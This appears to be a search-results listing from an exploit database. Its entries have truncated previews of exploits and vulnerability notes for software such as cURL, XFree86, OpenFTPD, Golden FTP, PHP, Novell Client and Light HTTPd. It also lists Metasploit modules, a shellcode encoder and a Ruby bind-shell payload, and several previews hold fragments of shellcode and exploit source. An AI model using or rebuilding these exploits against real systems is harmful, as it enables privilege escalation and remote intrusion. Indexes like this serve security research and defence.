203 matches found
cURL and libcurl smb_request_state function information disclosure vulnerability
cURL/libcURL is a command line file transfer tool that supports FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. A security vulnerability in the cURL and libcurl smb_request_state function allows remote attackers to conduct denial-of-service attacks by submitting requests of a speciall...
XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (3)
No description provided by source. source: http://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment...
Xt Library Local Root Command Execution Exploit
No description provided by source. include include include define DEFAULTOFFSET 0 define BUFFERSIZE 1491 long getespvoid asmmovl %esp,%eax\n; mainint argc, char argv char buff = NULL; unsigned long addrptr = NULL; char ptr = NULL; char execshell = \xeb\x23 \x5e \x8d\x1e \x89\x5e\x0b \x31\xd2...
OpenFTPD (<= 0.30.2) Remote Exploit
No description provided by source. / hoagieopenftpd.c LINUX/X86 OPENFTPD REMOTE EXPLOIT = 0.30.2 Searching for those warez ftpd's out there and leeching 'free' movies Remote Linux/OpenFTPD exploit for the format string bug in the message system. This vulnerability was rediscovered by a VOID.AT...
No-IP DUC <= 2.1.7 - Remote Code Execution Exploit
No description provided by source. xenomuta arroba phreaker punto net http://xenomuta.tuxfamily.org/ - Methylxantina 256mg Permlink: http://xenomuta.tuxfamily.org/exploits/noIPwn3r.c...
Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit
No description provided by source. GoldenFTP 4.70 PASS Exploit Authors: Craig Freyman cd1zz and Gerardo Iglesias Galvan iglesiasgg Tested on XP SP3 Vendor Contacted: 1/17/2011 no response For this exploit to work correctly, you need to know the subnet that the server is running on. You also need ...
Knox Software Arkeia 4.0 Backup Local Overflow
No description provided by source. / source: http://www.securityfocus.com/bid/661/info Knox Software Arkeia 4.0 Backup rnavc & nlserverd HOME Environment Variable Buffer Overflow A local buffer overflow in the handling of the HOME environment variable by the rlserver and rnavc binaries that are...
S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/656/info A buffer overflow vulnerability in sscw's handling of the HOME environment variable allows local users to gain root privileges. !/bin/bash Linux x86 exploit for /usr/bin/sccw on SuSE 6.2 -Brock Tellier...
S.u.S.E. 5.2 lpc Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/328/info The PLP Line Printer Control program, shipped with S.u.S.E. 5.2 is vulnerable to a local remote buffer overflow. You can determine whether you're vulnerable or not by typing 'lpc'. If you're presented with an lpc...
HP JetDirect PJL Query Execution
No description provided by source. Exploit Title: HP JetDirect PJL Query Execution Date: Aug 7, 2011 Author: Myo Soe YGN Ethical Hacker Group - http://yehg.net/ Software Link: http://www.hp.com Version: All Tested on: HP LaserJet Pxxxx Series $Id: $ This file is part of the Metasploit Framework a...
MIPS Linux XOR Shellcode Encoder (60 Bytes)
No description provided by source. include fcntl.h include stdio.h include unistd.h include sys/types.h include sys/stat.h include stdlib.h include string.h define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten...
PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit
No description provided by source. ?php // Proof of concept code from the Hardened-PHP...
AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)
No description provided by source. $Id: aasynclistreply.rb 11039 2010-11-14 19:03:24Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
CVE-2013-2163
Monkey HTTP Daemon (monkeyd) before 1.2.2 allows remote attackers to cause a denial of service (infinite loop) via an offset equal to the file size in the Range HTTP header...
Sub Encoder (optimised)
Encodes a payload using a series of SUB instructions and writing the encoded value to ESP. This concept is based on the known SUB encoding approach that is widely used to manually encode payloads with very restricted allowed character sets. It will not reset EAX to zero unless absolutely necessar...
Windows Gather Prefetch File Information
This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems and current values of related registry keys. From each prefetch file we'll collect filetime converted to UTC of the last execution, file path hash, run count, filename and the execution path. This module requires...
Novell Client 2 SP3 - 'nicm.sys 3.1.11.0' Local Privilege Escalation
Novell Client 2 SP3 Privilege escalation exploit Tested on Windows 7 and 8 x86 / nicm.sys 3.1.11.0 Thanks to Master Ryujin : The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov I am not sure whether there was anything else public Exploit for DEMO purposes...
Light HTTPd 0.1 (Windows) - Remote Buffer Overflow
import urllib2 from time import sleep Title: Windows Light HTTPD v0.1 HTTP GET Buffer Overflow Discovered and Reported: 24th of April, 2013 Discovered/Exploited By: Jacob Holcomb/Gimppy042 Software Vendor: http://sourceforge.net/projects/lhttpd/?source=navbar Exploit/Advisory: http://infosec42.blogspot.com...
Sami FTP Server - 'LIST' Buffer Overflow (Metasploit)
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit4 'Sami FTP Server...
Ruby Command Shell, Bind TCP IPv6
Continually listen for a connection and spawn a command shell via Ruby This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 524 include Msf::Payload::Single include Msf::Payload::Ruby...